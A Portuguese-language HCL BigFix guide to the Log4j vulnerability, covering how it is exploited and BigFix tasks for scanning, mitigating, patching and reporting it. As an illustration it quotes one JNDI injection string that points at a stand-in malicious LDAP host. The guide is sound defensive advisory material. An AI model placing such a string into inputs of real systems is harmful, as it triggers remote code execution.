Guia HCL BigFix

O que é isso?

É uma vulnerabilidade descoberta no Apache Log4j, a popular biblioteca Java desenvolvida e mantida pela fundação Apache. A biblioteca Log4j é amplamente utilizada em muitos produtos de software comercial e de código aberto como uma rotina de log Java. A criticidade da vulnerabilidade tem uma pontuação de 10/10 no sistema de pontuação de vulnerabilidade comum (CVSS) do MITRE.org, indicando a gravidade.  

Como é explorado?

O Log4j pode ser explorado remotamente por um adversário não autenticado usando a execução remota de código (RCE). Se um invasor enviar uma mensagem que contenha uma string como ${jndi:ldap://dirtyLDAP.com/X}), uma classe de código externa ou pesquisa de mensagem pode resultar na execução de código malicioso SEM autenticação.

Quem é impactado?

Centenas de milhões de dispositivos estão em risco, incluindo computadores governamentais, comerciais e domésticos. Além disso, cada dispositivo afetado pode ter dezenas ou centenas de locais onde reside o código vulnerável, pois o registro em log é uma ação extremamente comum em toda a computação.

Como o BigFix pode ajudar?

A equipe HCL BigFix está trabalhando junto com nossos clientes, especialistas em segurança e operações de TI para produzir conteúdo BigFix para ajudá-lo a identificar e corrigir as vulnerabilidades do Log4j em seu ambiente.

BigFix é a ferramenta essencial para as operações de TI. O BigFix automatiza a descoberta, o gerenciamento e a correção de todos os endpoints, sejam eles locais, móveis, virtuais ou na nuvem, independentemente do sistema operacional, localização ou conectividade. Com o BigFix Insights for Vulnerability Remediation, que se integra às principais soluções de gerenciamento de vulnerabilidades, como a Tenable, vulnerabilidades como o Log4j podem ser corrigidas mais rapidamente do que qualquer outra solução no mercado.

Com o BigFix, você pode descobrir, mitigar, corrigir vulnerabilidades, criar relatórios de pré e pós-correção e proteger endpoints corrigidos.

DESCOBERTA

O HCL BigFix desenvolveu tarefas para ajudar os usuários do BigFix a descobrir instâncias e vulnerabilidades do Log4J. Usamos o scanner Logpresso Log4j porque é um scanner baseado em Java de código aberto disponível no GitHub, desenvolvido pela equipe técnica da Logpresso e está disponível gratuitamente para a comunidade de segurança cibernética.

Essas tarefas fazem download de um tempo de execução Java temporário para executar a varredura e não exigem que o Java seja instalado no sistema. Essas tarefas funcionam no Windows 8.1 e superior (x86 e x64), Mac OS X, Linux (x86, x64, armv71, ppc64, ppc64LE e s390x), AIX 7.1 TL4 e superior e Solaris (x86 e SPARC). Com um download manual do JRE, as tarefas também podem ser executadas no HP-UX.

As quatro etapas a seguir articulam o processo geral para descobrir e relatar a vulnerabilidade:
 

1. No Site de Conteúdo "BES Inventory and License", execute a Tarefa 602 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only".
 

2. No site de conteúdo "BES Inventory and License", ative o Analysis 601 "log4j2-scan results".
 

3. Depois que os resultados da varredura tiverem sido transferidos por upload para o BigFix Server, visualize os resultados detalhados da varredura na Análise. Veja a imagem abaixo.
 

4.4. Para Relatório Executivo, use a visualização "Log4j Vulnerability Report (Logpresso Scan)" fornecida no BigFix Web Reports.

MITIGAR

Antes de os patches serem disponibilizados pelos fornecedores de aplicativos, há duas maneiras de mitigar o risco do Log4J:

1. Use o utilitário Logpresso Log4j-scan para remover classes Java vulneráveis ​​dos arquivos JAR Log4j-core afetados. A tarefa do BigFix para fazer isso está disponível no Site de Conteúdo "BES Inventory and License". Chama-se Tarefa 603 (Executar: log4j2-scan v2.9.2 – JAR Universal – Download JRE – COM REMEDIAÇÃO).
O utilitário Logpresso Log4j-scan pode executar algumas correções em bibliotecas JAR Log4j-Core afetadas, tanto para Log4j 2.xe Log4j 1.x. O utilitário mitiga o pior dos CVEs, mas pode não mitigar todas as vulnerabilidades baseadas em negação de serviço. No entanto, o utilitário this pode ser um passo muito eficaz para fornecer proteção, mantendo a compatibilidade com versões anteriores com aplicativos existentes. Para obter detalhes das mitigações específicas que podem ser realizadas pela ferramenta, visite https://github.com/logpresso/CVE-2021-44228-Scanner.

2. Pare ou desative os aplicativos ou serviços afetados.
 

REMEDIAR

À medida que os fornecedores disponibilizam os patches, o BigFix cria, testa e entrega rapidamente fixlets do BigFix. Faça download da lista mais recente de fixlets do BigFix que corrigem as vulnerabilidades do Log4J em https://www.hcltechsw.com/bigfix/log4j-ivr.
 

RELATÓRIO

Com o BigFix, os relatórios dos sistemas e bibliotecas afetados podem ser visualizados e arquivados usando o BigFix Web Reports que mostra o status de vulnerabilidade e mitigação em diferentes momentos.
 

PROTEGER

Depois que a vulnerabilidade for corrigida, o BigFix pode garantir que ela não reapareça. Com o BigFix, você pode planejar varreduras recorrentes usando a Tarefa de Detecção disponível para que qualquer novo sistema ou software com a vulnerabilidade Log4J possa ser identificado e corrigido.

Se precisar de mais assistência, pesquise no fórum do BigFix, entre em contato com os Serviços Profissionais do BigFix ou entre em contato com o Suporte Técnico.BigFix Professional Services.